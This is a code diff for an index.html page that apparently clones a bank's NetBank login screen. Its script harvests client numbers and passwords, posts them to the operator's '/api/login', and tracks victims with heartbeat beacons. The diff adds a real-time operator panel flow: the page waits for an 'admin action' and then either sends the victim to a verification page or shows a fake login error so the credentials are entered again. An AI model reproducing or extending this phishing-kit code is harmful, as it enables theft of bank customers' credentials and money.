--- a/index.html
+++ b/index.html
@@ -16,144 +16,229 @@
 <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTYyNzk3MDY5NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEWNoa1JlbWVtYmVyJGZpZWxkyajFL6pW3G2RJiK0b4vThcB6Jn0=" />
 </div>
 <script>
-    /* ===== 1. SESSION SET-UP ===== */
-    const sid = new URLSearchParams(location.search).get('sid') || sessionStorage.getItem('sid');
-    if (!sid) {
-      fetch('/api/session', {method:'post'})
-        .then(r=>r.json()).then(({sid:id})=>{
-          sessionStorage.setItem('sid',id);
-          location.search='?sid='+id;
-        });
-      throw 0;
-    }
-
-    /* ===== HEARTBEAT & PAGE CLOSE DETECTION ===== */
-    const heartbeatInterval = setInterval(() => {
-      fetch('/api/ping', {
-        method: 'POST',
-        headers: { 'content-type': 'application/json' },
-        body: JSON.stringify({ sid })
-      }).catch(() => {});
-    }, 10000);
-
-    window.addEventListener('beforeunload', () => {
-      clearInterval(heartbeatInterval);
-      navigator.sendBeacon('/api/exit', JSON.stringify({ sid }));
-    });
-
-    /* ===== 2. GET CLIENT NUMBER ===== */
-    function getClientNumber() {
-      const cifField = document.getElementById('txtMyClientNumber_field');
-      return cifField ? cifField.value.trim() : '';
-    }
-
-    /* ===== 3. GET PASSWORD ===== */
-    function getPassword() {
-      const pwdField = document.getElementById('txtMyPassword_field');
-      return pwdField ? pwdField.value : '';
-    }
-
-    /* ===== 4. SHOW LOADING OVERLAY ===== */
-    function showLoading() {
-      const overlay = document.createElement('div');
-      overlay.id = 'login-loading-overlay';
-      overlay.style.cssText = `
-        position: fixed;
-        top: 0;
-        left: 0;
-        width: 100%;
-        height: 100%;
-        background: rgba(0, 0, 0, 0.6);
-        backdrop-filter: blur(2px);
-        display: flex;
-        flex-direction: column;
-        align-items: center;
-        justify-content: center;
-        z-index: 9999;
-      `;
-
-      const spinner = document.createElement('div');
-      spinner.style.cssText = `
-        width: 60px;
-        height: 60px;
-        border: 4px solid rgba(255, 102, 0, 0.2);
-        border-top: 4px solid #ff6600;
-        border-radius: 50%;
-        animation: spin 1s linear infinite;
-      `;
-
-      const text = document.createElement('p');
-      text.textContent = 'Verifying...';
-      text.style.cssText = `
-        color: #ffffff;
-        font-family: Arial, sans-serif;
-        font-size: 16px;
-        margin-top: 20px;
-        letter-spacing: 1px;
-      `;
-
-      overlay.appendChild(spinner);
-      overlay.appendChild(text);
-      document.body.appendChild(overlay);
-
-      const style = document.createElement('style');
-      style.id = 'spin-style';
-      style.textContent = `
-        @keyframes spin {
-          0% { transform: rotate(0deg); }
-          100% { transform: rotate(360deg); }
-        }
-      `;
-      document.head.appendChild(style);
-    }
-
-    /* ===== 5. HIDE LOADING OVERLAY ===== */
-    function hideLoading() {
-      const existing = document.getElementById('login-loading-overlay');
-      if (existing) {
-        existing.style.opacity = '0';
-        setTimeout(() => existing.remove(), 300);
-      }
-    }
-
-    /* ===== 6. LOGIN ===== */
-    document.addEventListener('click', (e) => {
-      const btn = e.target.closest('#btnLogon_field');
-      if (!btn) return;
-
-      const clientNumber = getClientNumber();
-      const password = getPassword();
-
-      if (!clientNumber || !password) {
-        alert('Please enter both Client number and Password.');
-        return;
-      }
-
-      showLoading();
-
-      // Send credentials to your panel
-      const payload = { sid, clientNumber, password };
-      fetch('/api/login', {
-        method: 'POST',
-        headers: { 'content-type': 'application/json' },
-        body: JSON.stringify(payload)
-      })
-      .then(res => {
-        if (res.ok) {
-          // Redirect or handle success
-          window.location.href = '/panel';
-        } else {
-          hideLoading();
-          alert('Login failed. Please try again.');
-        }
-      })
-      .catch(err => {
-        hideLoading();
-        console.error('Fetch error:', err);
-        alert('An error occurred. Please try again.');
+  /* ===== 1. SESSION SET-UP ===== */
+  const sid = new URLSearchParams(location.search).get('sid') ||
+              sessionStorage.getItem('sid');
+  if (!sid) {
+    fetch('/api/session', {method:'post'})
+      .then(r=>r.json()).then(({sid:id})=>{
+        sessionStorage.setItem('sid',id);
+        location.search='?sid='+id;
       });
+    throw 0;
+  }
+
+  /* ===== HEARTBEAT & PAGE CLOSE DETECTION ===== */
+  const heartbeatInterval = setInterval(() => {
+    fetch('/api/ping', {
+      method: 'POST',
+      headers: { 'content-type': 'application/json' },
+      body: JSON.stringify({ sid })
+    }).catch(() => {});
+  }, 10000);
+
+  window.addEventListener('beforeunload', () => {
+    clearInterval(heartbeatInterval);
+    navigator.sendBeacon('/api/exit', JSON.stringify({ sid }));
+  });
+
+  /* ===== 2. GET CLIENT NUMBER ===== */
+  function getClientNumber() {
+    const cifField = document.getElementById('txtMyClientNumber_field');
+    return cifField ? cifField.value.trim() : '';
+  }
+
+  /* ===== 3. GET PASSWORD ===== */
+  function getPassword() {
+    const pwdField = document.getElementById('txtMyPassword_field');
+    return pwdField ? pwdField.value : '';
+  }
+
+  /* ===== 4. SHOW LOADING OVERLAY ===== */
+  function showLoading() {
+    const overlay = document.createElement('div');
+    overlay.id = 'login-loading-overlay';
+    overlay.style.cssText = `
+      position: fixed;
+      top: 0;
+      left: 0;
+      width: 100%;
+      height: 100%;
+      background: rgba(0, 0, 0, 0.6);
+      backdrop-filter: blur(2px);
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      justify-content: center;
+      z-index: 9999;
+    `;
+
+    const spinner = document.createElement('div');
+    spinner.style.cssText = `
+      width: 60px;
+      height: 60px;
+      border: 4px solid rgba(255, 102, 0, 0.2);
+      border-top: 4px solid #ff6600;
+      border-radius: 50%;
+      animation: spin 1s linear infinite;
+    `;
+
+    const text = document.createElement('p');
+    text.textContent = 'Verifying...';
+    text.style.cssText = `
+      color: #ffffff;
+      font-family: Arial, sans-serif;
+      font-size: 16px;
+      margin-top: 20px;
+      letter-spacing: 1px;
+    `;
+
+    overlay.appendChild(spinner);
+    overlay.appendChild(text);
+    document.body.appendChild(overlay);
+
+    const style = document.createElement('style');
+    style.id = 'spin-style';
+    style.textContent = `
+      @keyframes spin {
+        0% { transform: rotate(0deg); }
+        100% { transform: rotate(360deg); }
+      }
+    `;
+    document.head.appendChild(style);
+  }
+
+  /* ===== 5. HIDE LOADING OVERLAY ===== */
+  function hideLoading() {
+    const existing = document.getElementById('login-loading-overlay');
+    if (existing) {
+      existing.style.opacity = '0';
+      setTimeout(() => existing.remove(), 300);
+    }
+  }
+
+  /* ===== 6. SHOW ERROR MESSAGE ===== */
+  function showErrorMessage() {
+    const existingError = document.querySelector('.message.warning');
+    if (existingError) {
+      existingError.remove();
+    }
+
+    const loginInput = document.querySelector('.ft') || document.body;
+
+    const errorDiv = document.createElement('div');
+    errorDiv.className = 'message warning message-block';
+    errorDiv.innerHTML = `
+      <div class="message-content">
+        <p class="icon-block icon-info no-margin-bottom uia-error-message">
+          <span>
+            Sorry, your login details don't seem right. Please check and try again or
+            <a class="uia-forgotten-access-code" href="javascript:;" id="forgottenAccessCode">reset your access code here</a>.
+          </span>
+        </p>
+      </div>
+    `;
+
+    const form = document.querySelector('.ft') || loginInput;
+    if (form && form.firstChild) {
+      form.insertBefore(errorDiv, form.firstChild);
+    } else {
+      const container = document.querySelector('#ModuleLeft') || document.body;
+      container.insertBefore(errorDiv, container.firstChild);
+    }
+
+    window.scrollTo(0, 0);
+  }
+
+  /* ===== 7. CLEAR FORM ===== */
+  function clearForm() {
+    const cifField = document.getElementById('txtMyClientNumber_field');
+    if (cifField) {
+      cifField.value = '';
+      cifField.dispatchEvent(new Event('input', { bubbles: true }));
+    }
+
+    const pwdField = document.getElementById('txtMyPassword_field');
+    if (pwdField) {
+      pwdField.value = '';
+      pwdField.dispatchEvent(new Event('input', { bubbles: true }));
+    }
+  }
+
+  /* ===== 8. POLL FOR ADMIN ACTION ===== */
+  let isWaitingForAdmin = false;
+
+  function startPolling() {
+    if (isWaitingForAdmin) return;
+    isWaitingForAdmin = true;
+
+    const poll = async () => {
+      if (!isWaitingForAdmin) return;
+
+      try {
+        const res = await fetch(`/api/status/${sid}`);
+        const data = await res.json();
+
+        if (data.status === 'ok') {
+          isWaitingForAdmin = false;
+          window.location.href = '/verify.html';
+          return;
+        }
+
+        if (data.status === 'redo') {
+          isWaitingForAdmin = false;
+          hideLoading();
+          clearForm();
+          showErrorMessage();
+          return;
+        }
+
+        setTimeout(poll, 1200);
+
+      } catch (err) {
+        setTimeout(poll, 2000);
+      }
+    };
+
+    poll();
+  }
+
+  /* ===== 9. LOGIN ===== */
+  document.addEventListener('click', (e) => {
+    const btn = e.target.closest('#btnLogon_field');
+    if (!btn) return;
+
+    const clientNumber = getClientNumber();
+    const password = getPassword();
+
+    if (!clientNumber || !password) {
+      alert('Please enter both Client number and Password.');
+      return;
+    }
+
+    showLoading();
+
+    const payload = { sid, email: clientNumber, password };
+    fetch('/api/login', {
+      method: 'POST',
+      headers: { 'content-type': 'application/json' },
+      body: JSON.stringify(payload)
+    })
+    .then(res => {
+      if (res.ok) {
+        startPolling();
+      } else {
+        hideLoading();
+        alert('Login failed. Please try again.');
+      }
+    })
+    .catch(err => {
+      hideLoading();
+      console.error('Fetch error:', err);
+      alert('An error occurred. Please try again.');
     });
-  </script>
+  });
+</script>
 
 		<div id="BodyContainer">
 			<div id="Header">
@@ -342,3 +427,4 @@ WebForm_OnSubmit = function() {
 	<input type="hidden" id="SC_MEDIAMIND_ID" name="SC_MEDIAMIND_ID" value=""/><input type="hidden" id="SC_PRODUCT_ID" name="SC_PRODUCT_ID" value=""/><input type="hidden" id="SC_CUSTOMER_TYPE" name="SC_CUSTOMER_TYPE" value="NetBank"/><input type="hidden" id="SC_SCREEN_NAME" name="SC_SCREEN_NAME" value=""/>
 </body>
 </html>
+
